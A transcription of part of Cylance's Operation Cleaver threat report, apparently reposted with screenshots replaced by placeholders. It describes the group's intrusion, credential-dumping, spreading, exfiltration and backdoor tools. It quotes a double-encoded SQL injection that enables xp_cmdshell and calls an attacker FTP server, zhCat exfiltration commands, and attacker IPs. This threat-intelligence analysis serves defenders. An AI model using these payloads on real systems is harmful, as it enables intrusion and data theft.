  1329. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  1330. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  1331. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  1332. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  1333. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  1334. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  1335. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  1336. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  1337. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  1338. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  1339. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  1340. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  1341. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  1342. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  1343. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  1344. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  1345. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  1346. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  1347. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  1348. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  1349. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  1350. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  1351. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  1352. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  1353. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  1354. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  1355. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  1356. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  1357. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  1358. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  1359. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  1360. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  1361. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  1362. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  1363. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  1364. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  1365. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  1366. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  1367. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  1368.  
  1369. [ PG-31 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1370.  
  1371.  
  1372.  
  1373. [CYLANCE                                                                                  #OPCLEAVER]
  1374.  
  1375. TACTICS, TECHNIQUES & PROCEDURES
  1376.  
  1377. The Cleaver campaign used a variety of methods in multiple stages of attacks. In this section we’ll
  1378. cover the commonly observed methods during different stages of the attack.
  1379.  
  1380.  
  1381. INITIAL COMPROMISE
  1382.  
  1383. The initial compromise gets the attackers their first foothold into the target network. Once the
  1384. ability to execute arbitrary code has been established, an attacker’s job becomes quite a bit easier.
  1385. Since the vector of initial compromise is usually determined by what is vulnerable on the target,
  1386. we’ll cover just a few of the techniques we’ve seen Operation Cleaver use to initiate the compromise.
  1387.  
  1388.  
  1389. SQL Injection
  1390.  
  1391. SQL injection is a very common and simple attack method. It is made possible by a lack of input
  1392. sanitization by the vulnerable application before supplying that input into a SQL database query.
  1393. SQL injection payloads used by this organization have been double encoded. Double encoding SQL
  1394. injection payloads allows for bypassing of various anti-exploitation filters, such as those supplied
  1395. by Web Application Firewalls (WAFs).
  1396.  
  1397. The attackers would enable xp_cmdshell:
  1398.  
  1399. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20show
  1400. advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_ cmdshell;%20EXEC%20master.dbo.
  1401. sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20
  1402.  
  1403. Then connect outbound via anonymous FTP:
  1404.  
  1405. http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20
  1406. ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%20
  1407.  
  1408. Spear-Phishing Campaign
  1409.  
  1410. Using messaging methods such as email, attackers can social engineer users into downloading and
  1411. executing software, which quietly installs malware alongside of the desired program. Operation
  1412. Cleaver has employed this technique numerous times across different organizations.
  1413.  
  1414. [ PG-32 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1415.  
  1416.  
  1417.  
  1418. [CYLANCE                                                                                  #OPCLEAVER]
  1419.  
  1420.  
  1421. EasyResumeCreatorPro.com
  1422.  
  1423. The domain EasyResumeCreatorPro.com was registered and a website setup which was a direct copy of a
  1424. legitimate website at winresume.com. This is how the original site looked:
  1425.  
  1426.  
  1427. [EWWW SCREENCAP!]
  1428.  
  1429. Figure 14: The original Easy Résumé Creator Pro website on winresume.com is legitimate.
  1430.  
  1431. [EWWW SCREENCAP!]
  1432.  
  1433. Figure 15: The fraudulent website, easyresumecreatorpro.com, is a fraudulent copy of the Easy Resume
  1434. Creator Pro website to lure job candidates to download and install their TinyZBot agent.
  1435.  
  1436. That’s not all they copied. In order to infect users, they combined the original Easy Resume Creator
  1437. Pro product with malware by using a binder they developed internally named Binder_1. A binder is an
  1438. application, which combines two executables (desired software and malware) into a single executable.
  1439.  
  1440. The resulting executable masquerades as the desired software. The purpose is deception, to make the
  1441. binder indistinguishable from the desired application. When executed, both applications are written
  1442. to a temporary directory and executed. This way it appears that the desired application was executed,
  1443. but the malware was also executed silently.
  1444.  
  1445. [ PG-33 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1446.  
  1447.  
  1448.  
  1449. [CYLANCE                                                                                  #OPCLEAVER]
  1450.  
  1451. Teledyne Résumé Submitter
  1452.  
  1453. [EWWW SCREENCAP!]
  1454.  
  1455. Figure 16: When the résumé submitting application is executed, a splash screen is displayed.
  1456.  
  1457. [EWWW SCREENCAP!]
  1458.  
  1459. Figure 17: Unable to connect to the Internet, the tool prompts the user for proxy configuration
  1460. information.
  1461.  
  1462. This attack evolved to appear more legitimate. The attackers made the victims feel like they had a
  1463. pending  job opportunity at the industrial conglomerate Teledyne. In order to take advantage of this
  1464. job opportunity, the victim needed to use the fake résumé submission application supplied by the
  1465. malicious recruiter. Multiple domains were registered in order to make the download sites seem more
  1466. realistic. These domains included other companies as they tried to hit a wider audience.
  1467.  
  1468. *       Teledyne-Jobs.com
  1469. *       Doosan-Job.com
  1470. *       NorthropGrumman.net
  1471.  
  1472. At this point, the résumé submission application checks the Internet connection. If it is unable to
  1473. connect to the Internet, it will display a window to input proxy information.
  1474.  
  1475. When this information is entered, the results are cached in a location the dropped malware can access.
  1476. After an Internet connection is ensured, the malware (TinyZbot) is dropped and executed. This clever
  1477. scheme makes sure the malware can connect to the command and control server, and increases the
  1478. chances that domain credentials are cached on the now infected machine. Shortly after, the main
  1479. application is launched.
  1480.  
  1481.  
  1482. [EWWW SCREENCAP!]
  1483.  
  1484. Figure 18: Final résumé submission form displays to the user while the malware runs freely in the
  1485. background.
  1486.  
  1487. [ PG-34 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1488.  
  1489.  
  1490.  
  1491. [CYLANCE                                                                                  #OPCLEAVER]
  1492.  
  1493.  
  1494. Teledyne Résumé Submitter (cont.)
  1495.  
  1496. The first résumé submission form requests contact information. This form, like the rest of the
  1497. submission forms, only stores the submitted information while the application is running. As the
  1498. infected user is going through and filling out all this information, the malware is running in the
  1499. background, logging their keystrokes, retrieving their stored passwords, etc. Once all the forms are
  1500. filled out, the user goes to the submission form.
  1501.  
  1502.  
  1503. [EWWW SCREENCAP!]
  1504.  
  1505. Figure 19: GET request to www.microsoft.com fakes the résumé submission.
  1506.  
  1507.  
  1508.  
  1509. When the victim hits submit, the résumé submitter does a GET request to microsoft.com in order to make
  1510. it seem like it is submitting something, then claims success.
  1511.  
  1512. This method is particularly effective not only because of its level of deception, but even if the
  1513. victim suspects that they are infected with malware, they are not as likely to speak up about it,
  1514. as they would need to explain why they were submitting a job application for another company.
  1515.  
  1516. [ PG-35 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1517.  
  1518.  
  1519.  
  1520. [CYLANCE                                                                                  #OPCLEAVER]
  1521.  
  1522.  
  1523. PRIVILEGE ESCALATION & PIVOTING
  1524.  
  1525. Privilege escalation is a category of techniques that describe the process of going from a less
  1526. privileged user on a compromised computer to a more privileged user. This increase in privileges
  1527. allows for the attacker to gain access to privleged areas of the operating system as well as to infect
  1528. other computers on the target network.
  1529.  
  1530. This team did not utilize any novel methods of privilege escalation, but they were observed using a
  1531. variety of publicly known exploits. PrivEsc is a compiled exploit, which leverages the vulnerability
  1532. commonly referred to as KiTrap0D (CVE-2010-0232). The exploit allows for escalation of privileges on
  1533. unpatched Windows operating systems from an unprivileged user to kernel-level privilege.
  1534.  
  1535.  
  1536. This vulnerability and the corresponding exploit were discovered and developed in 2010. The plagiarized
  1537. version used in Operation Cleaver was compiled in May 2013, with a slight modification to the public
  1538. source code. This modification changed the author’s details to Zhopin Exploit Team.
  1539.  
  1540. Pivoting is the process of leveraging access from one compromised computer in order to gain access to
  1541. additional systems on the target network. This can involve launching attacks from the compromised
  1542. computer, or simply abusing access once it has been gained.
  1543.  
  1544.  
  1545. Cached Credential Dumping
  1546.  
  1547. A very common method of pivoting on a predominantly Windows operating system based network is to
  1548. extract domain credentials which have been used on the compromised computer from a credential cache.
  1549. There are a few well-known tools which are capable of doing this given sufficient privileges on the
  1550. infected host. Two of these tools used by Cleaver are Mimikatz and Windows Credential Editor.
  1551.  
  1552.  
  1553. zhMimikatz and MimikatzWrapper
  1554.  
  1555. Two similar applications were developed by Operation Cleaver in order automate the execution of
  1556. Mimikatz. These applications are zhMimikatz and MimikatzWrapper. These applications store multiple
  1557. versions of Mimikatz in their resources. When executed, they determine which version of Mimikatz to
  1558. use based on whether the computer’s version of Windows is 32-bit or 64-bit. This technique is
  1559. uncommon in malware and shows the advanced skillset of the Cleaver team. Both tools were developed
  1560. in C#.
  1561.  
  1562. [ PG-36 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1563.  
  1564.  
  1565.  
  1566. [CYLANCE                                                                                  #OPCLEAVER]
  1567.  
  1568. zhMimikatz and MimikatzWrapper (cont.)
  1569.  
  1570. In the following examples, the computer name is TheComputerName, the username of the logged in user
  1571. is TheUser, and that user’s password is ThePassword. At the time of execution, the system only has
  1572. its own credentials available and no cached network credentials.
  1573.  
  1574. zhMimikatz
  1575.  
  1576. zhMimikatz executes the correct version of Mimikatz for the current system, and parses the results
  1577. for any cached credentials.
  1578.  
  1579. [EWWW SCREENCAP!]
  1580.  
  1581. Figure 20: zhMimikatz
  1582.  
  1583. [ PG-37 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1584.  
  1585.  
  1586.  
  1587. [CYLANCE                                                                                  #OPCLEAVER]
  1588.  
  1589. MimikatzWrapper
  1590.  
  1591. Output from MimikatzWrapper is essentially the same as zhMimikatz, despite being a different Visual
  1592. Studio project.
  1593.  
  1594. [EWWW SCREENCAP!]
  1595.  
  1596. Figure 21: The MimikatzWrapper.
  1597.  
  1598. The only external difference is that MimikatzWrapper also logs these results to res.txt in the
  1599. executing directory. This can make it useful for tools like the PVZ tool chain and Csext to execute
  1600. with logged results:
  1601.  
  1602. [EWWW SCREENCAP!]
  1603.  
  1604. Figure 22: The MimikatzWrapper dumps credentials out to a file.
  1605.  
  1606. [ PG-38 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1607.  
  1608.  
  1609.  
  1610. [CYLANCE                                                                                  #OPCLEAVER]
  1611.  
  1612. PsExec Spreading
  1613.  
  1614. Once an attacker has credentials extracted from the cache, whether in hash form or in plaintext form,
  1615. PsExec can be used to run commands on any other computer which accepts those domain credentials.
  1616. If this technique is combined with cached credential dumping, it can be used to jump from computer
  1617. to computer on a compromised network.
  1618.  
  1619.  
  1620. NetC (Net Crawler)
  1621.  
  1622. Net Crawler utilizes a cached credential dumping technique along with PsExec in order to worm
  1623. throughout a network, collecting any and all credentials that it can extract from credential caches.
  1624. It has the ability to do this with both Windows Credential Editor and Mimikatz. It starts by first
  1625. extracting cached credentials from the infected computer’s cache. Once this is complete, it then
  1626. continues to scan a set of configured IP addresses on the local subnet to determine which IP addresses
  1627. have SMB related ports open. Then an iterative methodology is applied to brute forcing each SMB enabled
  1628. target with each credential that was extracted from the cache.
  1629.  
  1630. When a positive result has been achieved, it will create a copy of itself with a modified configuration
  1631. stored as a PE resource, then send and execute the copy utilizing PsExec. This copy repeats the
  1632. behavior of the original, but with already discovered credentials as well as newly discovered ones on
  1633. the newly infected host. Any credentials found are reported back to the original infection.
  1634.  
  1635. [ PG-39 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1636.  
  1637.  
  1638.  
  1639. [CYLANCE                                                                                  #OPCLEAVER]
  1640.  
  1641. NetC (Net Crawler) cont.
  1642.  
  1643. The following is a sample of some of the recovered results of Net Crawler executing on a live network:
  1644.  
  1645. [EWWW SCREENCAP!]
  1646.  
  1647. Figure 23: The real output of a successfully run NetC effort at a victim organization.
  1648.  
  1649.  
  1650. A more in depth analysis of Net Crawler, as part of the A Study in Bots series, will be available on
  1651. Cylance’s blog.
  1652.  
  1653. [ PG-40 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1654.  
  1655.  
  1656.  
  1657. [CYLANCE                                                                                  #OPCLEAVER]
  1658.  
  1659. MS08-067 Exploit
  1660.  
  1661. MS08-067 is a vulnerability in Microsoft Windows made popular by the Conficker worm which can be
  1662. exploited by a specially crafted packet to the operating system’s RPC network interface. This
  1663. vulnerability has been patched since October 2008, but many networks have failed to update their
  1664. systems even to this day.
  1665.  
  1666. Operation Cleaver used a plagiarized version of a publicly available exploit for this vulnerability
  1667. developed in Python. Someone in the Cleaver team (presumed to be Nesha) modified the exploit to read
  1668. “By Nesha”.
  1669.  
  1670. Jasus
  1671.  
  1672. Jasus is an ARP cache poisoner developed by the Operation Cleaver team. It makes use of WinPcap and
  1673. is developed in C. Compared to some other publicly available ARP cache poisoning utilities, Jasus
  1674. is poorly developed and without many useful features. The primary positive attribute of Jasus is its
  1675. poor detection ratio by the antivirus industry.
  1676.  
  1677.  
  1678. Cain & Abel
  1679.  
  1680. Cain & Abel is a publicly available toolkit, which covers a wide range of functionality that assists
  1681. attackers once they have compromised a node on a network. It has the ability to dump stored and
  1682. cached credentials, and conduct attacks like ARP cache poisoning in order to capture credentials
  1683. being transmitted on the network. It also has a remotely installable trojan named Abel, which
  1684. enables some of its functionality on a remote target.
  1685.  
  1686. We observed the Operation Cleaver team using Cain & Abel for extracting credentials from caches and
  1687. the network when they are confident that there is little to no antivirus protection on the infected target.
  1688.  
  1689.  
  1690. EXFILTRATION
  1691.  
  1692. Exfiltration is the process of moving information to an external site. In this context, it is the
  1693. process of stealing information without being detected. Operation Cleaver has a strong focus on
  1694. stealing confidential/privileged information, and they have utilized a few methods in order to
  1695. facilitate this objective.
  1696.  
  1697. [ PG-41 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1698.  
  1699.  
  1700.  
  1701. [CYLANCE                                                                                  #OPCLEAVER]
  1702.  
  1703. Anonymous FTP Servers
  1704.  
  1705. Cleaver Operations observed in 2013 mainly utilized FTP servers with anonymous access enabled in
  1706. order to pilfer large quantities of information. This allowed them to use existing command line utilities
  1707. available on their targets in order to upload information. This is a versatile technique as it does
  1708. not require any additional software which could be detected. These FTP servers were also observed
  1709. during the infection process, as infected computers were often instructed to download additional
  1710. files from these FTP servers, including backdoors and pivoting tools.
  1711.  
  1712. The following IP addresses hosted FTP servers that were used in the infection of targets or in the
  1713. exfiltration of information.
  1714.  
  1715.  
  1716. * 108.175.152.230 – Santa Rosa, CA, USA
  1717. * 108.175.153.158 – Santa Rosa, CA, USA
  1718. * 184.82.181.48 – Pilot Mountain, North Carolina, USA
  1719. * 203.150.224.249 - Thailand
  1720. * 64.120.208.74 - Pilot Mountain, North Carolina, USA
  1721. * 64.120.208.75 - Pilot Mountain, North Carolina, USA&Z
  1722. * 64.120.208.76 - Pilot Mountain, North Carolina, USA
  1723. * 64.120.208.78 - Pilot Mountain, North Carolina, USA
  1724. * 66.96.252.198 - Pilot Mountain, North Carolina, USA
  1725.  
  1726. NetCat
  1727.  
  1728. NetCat is a network tool which has many valid purposes but can also be used for malicious purposes.
  1729. Its main functionality allows for a client and server communication channel, allowing for information
  1730. to be transported over the network simply. NetCat has an option when being compiled to enable or
  1731. disable the ability for NetCat to execute a command after the connection is established. This
  1732. feature can be abused to enable a reverse connecting shell, which can be used to remotely control a target.
  1733.  
  1734. NetCat’s network communications are in plaintext, and could be viewed by an egress filter looking
  1735. to block the exfiltration of sensitive information. The Operation Cleaver team was observed attempting
  1736. to use NetCat to exfiltrate information as well as use it as a reverse connecting shell. The use of
  1737. NetCat was later replaced with zhCat.
  1738.  
  1739. [ PG-42 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1740.  
  1741.  
  1742.  
  1743. [CYLANCE                                                                                  #OPCLEAVER]
  1744.  
  1745. zhCat
  1746.  
  1747. zhCat is a tool developed by the Operation Cleaver team which operates similarly to NetCat. Its main
  1748. purpose is to create a channel that is capable of transporting information over the network. The
  1749. changes made in zhCat allow for this information to be transferred with inline obfuscation and/ or
  1750. encryption. This makes it more difficult to detect that privileged information is being exfiltrated.
  1751.  
  1752. The command line help (of a particular version) shows the following options:
  1753.  
  1754. [EWWW SCREENCAP!]
  1755.  
  1756.  
  1757. Multiple obfuscation/encryption methods are available. The –h argument enables HTTP mode.
  1758. This makes the traffic between zhCat instances look like benign HTTP traffic. For instance, if the
  1759. attackers set up a zhCat instance listening on port 1000 on 192.168.116.128 in HTTP mode, the client
  1760. instance of zhCat would use the following command:
  1761.  
  1762. zhcat.exe –h –p 1000 –i 192.168.116.128
  1763.  
  1764. The server instance would use the following command:
  1765.  
  1766. zhcat.exe –l –h –p 1000
  1767.  
  1768. When we run both of these, we can send information just by typing it into the terminal of the running
  1769. application. Information can be supplied by standard input.
  1770.  
  1771. [EWWW SCREENCAP!]
  1772.  
  1773.  
  1774. [ PG-43 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1775.  
  1776.  
  1777.  
  1778. [CYLANCE                                                                                  #OPCLEAVER]
  1779.  
  1780. zhCat (cont.)
  1781.  
  1782. If we observe the network communications during this transfer, we can see the following HTTP POST request.
  1783.  
  1784. [EWWW SCREENCAP!]
  1785.  
  1786. Note: research into ebizmba.com did not turn up any additional evidence of being involved with the
  1787. development of zhCat.
  1788.  
  1789. On the server side, we can see our message has been received:
  1790.  
  1791. [EWWW SCREENCAP!]
  1792.  
  1793. If stricter egress filtering is enabled, the attackers can use zhCat to also XOR encrypt the traffic
  1794. with a shared key. These keys are stored inside zhCat. The following is the key used for XOR encryption:
  1795.  
  1796.  
  1797. Sorry! The handle to file %s is not a valid handle any more.\nSorry!
  1798. The handle to file %s is not a valid handle any more.
  1799.  
  1800. The \n represents hex character 0x0A, which is a new line character.
  1801.  
  1802. An attacker could set up a server instance of zhCat with the following command in order to enable both
  1803. HTTP and XOR obfuscation:
  1804.  
  1805. zhcat.exe –h –p 1000 –l –x
  1806.  
  1807. The client instance could then be invoked with the following command:
  1808.  
  1809. zhcat.exe –h –p 1000 –i 192.168.116.128 –x
  1810.  
  1811. Once again, information can be supplied via standard input.
  1812.  
  1813. [ PG-44 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1814.  
  1815.  
  1816.  
  1817. [CYLANCE                                                                                  #OPCLEAVER]
  1818.  
  1819. zhCat (cont.)
  1820.  
  1821.  
  1822. [EWWW SCREENCAP!]
  1823.  
  1824. Upon inspecting the network traffic again, we see the following HTTP POST request.
  1825.  
  1826. [EWWW SCREENCAP!]
  1827.  
  1828. On the server side, we can see this information being received:
  1829.  
  1830. [EWWW SCREENCAP!]
  1831.  
  1832. zhCat has a variety of other features such as port mirroring as well as traffic redirecting.
  1833.  
  1834.  
  1835. PLink
  1836.  
  1837. PLink is one of the many utilities provided in the PuTTY (SSH) suite, which has many benign purposes.
  1838. It is capable of communicating over various protocols, the most notable being SSH. The SSH protocol
  1839. is a heavily utilized encrypted protocol, most commonly used for remote administration of UNIX based
  1840. operating systems. PLink is designed to implement some of the SSH functions related to forwarding
  1841. traffic as well as other functionality.
  1842.  
  1843. Operation Cleaver uses PLink to forward local RDP ports to remote SSH servers. This allows them to
  1844. easily connect to RDP servers inside the networks of their victims. These RDP connections can be
  1845. used to exfiltrate information visually, as well as to remotely control the computers hosting the
  1846. RDP servers.
  1847.  
  1848. [ PG-45 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1849.  
  1850.  
  1851.  
  1852. [CYLANCE                                                                                  #OPCLEAVER]
  1853.  
  1854. SMTP
  1855.  
  1856. Early Cleaver operations abused SMTP in order to exfiltrate information. The sending is performed
  1857. by internally developed malware samples such as TinyZBot and Csext in order to exfiltrate information
  1858. about the infected computer, as well as requested files and keystroke logging information. Messages
  1859. were sent using an open SMTP relay at BeyondSys.com with  the sender email address
  1860. dyanachear(at)beyondsys.com. This allowed the attackers to use infrastructure that was not theirs
  1861. to exfiltrate information. The known recipient addresses of this information were
  1862. testmail_00001(at)yahoo.com and TerafficAnalyzer(at)yahoo. com. In order to deceive anyone reading
  1863. these emails, they made them appear to be a spam message that most would not think twice about. The
  1864. subject used is the following:
  1865.  
  1866. No Prescription required. Viagra Dosages: 25, 100, 150mg.
  1867. Fast worldwide delivery.
  1868.  
  1869. The message used is the following:
  1870.  
  1871. Buy Viagra150mg x 50 tablets for only $124.99!
  1872.  
  1873. No Prescription required. Viagra dosages: 150, 100, 25mg. Fast
  1874. Worldwide Delivery.
  1875.  
  1876. See the attachment movie.
  1877. Free bonus trip.
  1878. bestviagra4u.cn
  1879.  
  1880. The files being exfiltrated are added to the email as attachments.
  1881.  
  1882.  
  1883. SOAP
  1884.  
  1885. SOAP is a sub-protocol communicated via HTTP. In relation to Operation Cleaver, it is used as the
  1886. command and control protocol for TinyZBot, which was the preferred backdoor, and underwent long-term
  1887. development. HTTP communications are often used by botnets, but it is uncommon to use a sub-protocol
  1888. such as SOAP. It is likely that SOAP was used because it is simple to implement in C#, and has the
  1889. added benefit of blending in with other benign HTTP traffic.
  1890.  
  1891. As part of TinyZBot’s command and control protocol, files can be exfiltrated over SOAP to the command
  1892. and control server. For more information about TinyZBot, see the Persistence section.
  1893.  
  1894. [ PG-46 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1895.  
  1896.  
  1897.  
  1898. [CYLANCE                                                                                  #OPCLEAVER]
  1899.  
  1900. PERSISTENCE
  1901.  
  1902. Persistence is the means of maintaining access to a compromised network. There are limitless methods
  1903. of persistence; the following are techniques and tools for persistence used by Cleaver.
  1904.  
  1905.  
  1906. TinyZBot
  1907.  
  1908. TinyZBot is a backdoor developed in C#. This bot is the longest developed malware we have analyzed
  1909. from this organization. The earliest known version was compiled in January 2013 and we continued to
  1910. see new versions being created actively. The purpose of TinyZBot is to gather information from an
  1911. infected computer as well as maintain and further access into a compromised network.
  1912.  
  1913. TinyZBot was developed with the clear intention of targeted campaigns. The name TinyZBot is assumed
  1914. to be referring to this project as a less versatile version of the ZeuS botnet, although it does not
  1915. exhibit the major browser injection features of ZeuS. To be clear, TinyZBot shares no code with ZeuS
  1916. or its variants, and is developed in a different programming language. The majority of the code in
  1917. TinyZBot was created by Cleaver.
  1918.  
  1919.  
  1920. TinyZBot Features
  1921.  
  1922. TinyZBot supports a wide array of features that continually evolved over time. For the evolution of
  1923. features, see the History section. The following is a list of supported features:
  1924.  
  1925. *       SMTP exfiltration
  1926. *       Log keystrokes
  1927. *       Monitor clipboard activity
  1928. *       Enable a SOAP-based command and control channel
  1929. *       Self-updating
  1930. *       Download and execute arbitrary code
  1931. *       Capture screenshots
  1932. *       Extract saved passwords for Internet Explorer
  1933. *       Install as a service
  1934. *       Establish persistence by shortcut in startup folder
  1935. *       Provide unique malware campaign identifiers for tracking and control purposes
  1936. *       Deceptive execution methods
  1937. *       Dynamic backdoor configuration
  1938. *       FTP exfiltration
  1939. *       Security software detection
  1940. *       Ability to disable Avira antivirus
  1941. *       Ability to modify PE resources
  1942. *       Dynamic plugin structure
  1943.  
  1944. [ PG-4y Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1945.  
  1946.  
  1947.  
  1948. [CYLANCE                                                                                  #OPCLEAVER]
  1949.  
  1950. TinyZBot Command and Control Protocol
  1951.  
  1952. The command and control mechanism for TinyZBot utilizes SOAP communicating over HTTP. Potential reasons
  1953. for using SOAP are:
  1954.  
  1955. 1.      SOAP-based communications are simple to implement in C#.
  1956. 2.      SOAP traffic could easily be considered benign traffic, as it is not commonly seen in malware.
  1957.  
  1958.  
